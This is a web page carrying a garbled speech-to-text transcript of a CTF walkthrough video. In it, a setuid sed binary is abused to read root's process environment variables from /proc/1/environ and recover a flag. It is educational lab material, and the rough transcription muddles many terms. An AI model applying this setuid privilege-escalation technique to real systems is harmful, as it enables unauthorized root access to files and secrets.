b00t2root19 CTF: Groot (3/3) [LINUX Post-Exploitation]
Skills:
Defensive AI70%
Key Takeaways
Exploits a Linux Post-Exploitation challenge using a set UID binary to escalate privileges and gain root access
Full Transcript
[Music] hello ladies and gentlemen my name is John Hammond welcome back from the beauty video we're talking about the boot to route CTF for the 2019 edition we're in the Linux category and this is the last challenge in that category called grouped we know groots no more but we can still hear him in the environment can you and we have our connect Auto Sage script we have to solve Tony stank first as in we need to become the Tony user because that gives us our privileges and this is the again the exact same connect auto sage script so this challenge has been growing that it has been kind of continuing off itself building off itself so here I am still logged in as Tony and that user I minimize that on accident ok so what we know now is that we have said as a potential prove privilege escalation Avenue right because it is running as a set UID binary been said so we have routes privileges when we use said we can check out gtfo bins and we could get a root shell potentially we also can write files as rude etc etc we could we can use this to do a lot of damage potentially all we've done so far is just read a file with it so knowing that challenge prompts I'll showcase just reading that file again it was dot flag because that does not have any LS it does not have any user privileges only root can read that so very important that we know that in this case now what we can do is something very very special pertaining to this challenge prompt it's a hint here we know groups no more but we can still hear them in the environment so environment right you'd think of environment variables you can check out env you can see we've got a lot of environment variables that are said none of them extremely useful right now but remember we want to know the routes environments and routes not a user so it must be referring to route the Linux user route and remember when we checked out running processes we have route doing this thing that had the original flag and that's process ID one route has a lot of other processes running so if you wanted to why don't we check out the environment variables for every process that's running right maybe we've got some some good Avenue there you can check through one of these one by one you can do a loop however what I'm just gonna end up turning for years you go ahead and cat out like we had done before with proc folder in the links filesystem you can check out all the different thing information you can get about our process what the command line is the executable move in that current working directory etc if you had that privileges we could check out proc one command line and that's what we did to solve the first challenge or we could check out some other information like the environment variables and Vai run is what it's called sorry and we aren't able to read it as Tony remember because it's it's routes environment verbal so you have to read it as route said gives us that capability so we can run said nothing regular expression to replace or work with we just read that file and there we go again if you were to pipe this into strings and in a machine that you had strings on you could see that a little bit more readable fashion however we've got flag equals boot to route I am Groot and that's that that is the last challenge in the Linux category go ahead and submit that for that many points and now you're on the list now you're in that that portion I know that we did get first blood on that only some more than certain we got first blood on that I maybe we didn't I don't know thought we had I'll be obviously we hadn't but I know we were very excited about it and Raj and I when we again profs tirage special thank you to you for participating with me and in this quarter server if you are do the discord server you absolutely should be link in description come hang out if you like this video please do like comment subscribe I'll see in the next video [Music] [Music] [Music] [Music]
Original Description
If you would like to support me, please like, comment & subscribe, and check me out on Patreon: https://patreon.com/johnhammond010
E-mail: johnhammond010@gmail.com
PayPal: http://paypal.me/johnhammond010
GitHub: https://github.com/JohnHammond
Site: http://www.johnhammond.org
Twitter: https://twitter.com/_johnhammond
Watch on YouTube ↗
(saves to browser)
Sign in to unlock AI tutor explanation · ⚡30
Playlist
Uploads from John Hammond · John Hammond · 0 of 60
← Previous
Next →
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
Code Commentaries? PHP to JavaScript in Bash and PHP!
John Hammond
Tutorials? MySQL connection with PHP and Bash!
John Hammond
Variable Naming in Python! Happy Birthday, Linux! Nokia N900!
John Hammond
JavaScript Splits The URL!
John Hammond
HTML Tables in Python!
John Hammond
HTML, Net Shares, GML!
John Hammond
Python 08 Programming Style and Comments
John Hammond
Python 26 Object Oriented Programming
John Hammond
75 Python Tutorials, Out Now!
John Hammond
Batch 14 Mathematical Expressions
John Hammond
Batch 85 Array Append
John Hammond
Batch 86 Array Count
John Hammond
Batch 87 Array Index
John Hammond
Batch 88 Array Insert
John Hammond
Batch 89 Array Remove
John Hammond
Batch 90 Array Reverse
John Hammond
Python [colorama] 00 Installing on Linux
John Hammond
Python [colorama] 09 Cursor Position
John Hammond
Python [hashlib] 02 Algorithms
John Hammond
Python 00 Installing IDLE on Linux
John Hammond
Python [pygame] 11 Rectangular Collision Detection
John Hammond
Python [pygame] 12 Platforming Rectangular Collision Resolution
John Hammond
Python [XML-RPC] 01 Research
John Hammond
Python [pyenchant] 03 Personal Word Lists
John Hammond
FancyURLopener Authentication and User-Agent [urllib] 03
John Hammond
Python 04: PEP8 Coding
John Hammond
Python Challenge! 17 COOKIES
John Hammond
Google CTF 2016: Ernst Echidna
John Hammond
Google CTF 2016: Spotted Quoll
John Hammond
Google CTF 2016: Can you Repo It?
John Hammond
Google CTF 2016: No Big Deal
John Hammond
Google CTF 2016: In Recorded Conversation
John Hammond
Homemade CTF Challenge: 01 "Orchestra"
John Hammond
Homemade CTF Challenge: 02 "Bae's Base"
John Hammond
Homemade CTF Challenge: 03 "Web Hunt"
John Hammond
Homemade CTF Challenge: 04 "UPX"
John Hammond
Homemade CTF Challenge: 05 "The Assumption Song"
John Hammond
Homemade CTF Challenge: 06 "A Brisk Stroll"
John Hammond
Homemade CTF Challenge: 06 "I lost my password!"
John Hammond
web25 :: Mr. Robot : EKOPARTY CTF 2016
John Hammond
web50 : RFC 7230 :: EKOPARTY CTF 2016
John Hammond
misc50 : Hidden inside EKO :: EKOPARTY CTF 2016
John Hammond
Hack The Vote 2016 CTF: Sander's Fan Club [web100]
John Hammond
Hack The Vote 2016 CTF Warpspeed [forensics150]
John Hammond
Juniors CTF 2016 :: Black Suprematic Square
John Hammond
Juniors CTF 2016 :: Six Strange Tales
John Hammond
Juniors CTF 2016 :: Lost Code
John Hammond
Juniors CTF 2016 :: Here Goes!
John Hammond
Juniors CTF 2016 :: Southern Cross
John Hammond
Juniors CTF 2016 :: Clone Attack
John Hammond
Juniors CTF 2016 :: Dirty Repo
John Hammond
Juniors CTF 2016 :: Hackers Blog
John Hammond
Juniors CTF 2016 :: Voting!!!
John Hammond
Juniors CTF 2016 :: The Good, The Bad and The Junkman
John Hammond
Juniors CTF 2016 :: Stop Thief!
John Hammond
Juniors CTF 2016 :: ROFL
John Hammond
Juniors CTF 2016 :: Restriced Area
John Hammond
Juniors CTF 2016 :: Oh SSH!
John Hammond
HackCon CTF 2017 TRIVIA and BONUS Challenges
John Hammond
HackCon CTF 2017 "Bacche" Challenges
John Hammond
More on: Defensive AI
View skill →Related Reads
📰
📰
📰
📰
Threat Hunting: Introduction (THM) Tryhackme Walkthrough
Medium · Cybersecurity
How I Built a Free AI-Powered Cybersecurity Guide
Dev.to · Aribu js
Checkov: Guia Completo de Segurança para Infraestrutura como Código
Dev.to · Luis Cruz
Fixing XDP Redirect Map Failures for Edge Security
Dev.to · Andrei Toma
🎓
Tutor Explanation
DeepCamp AI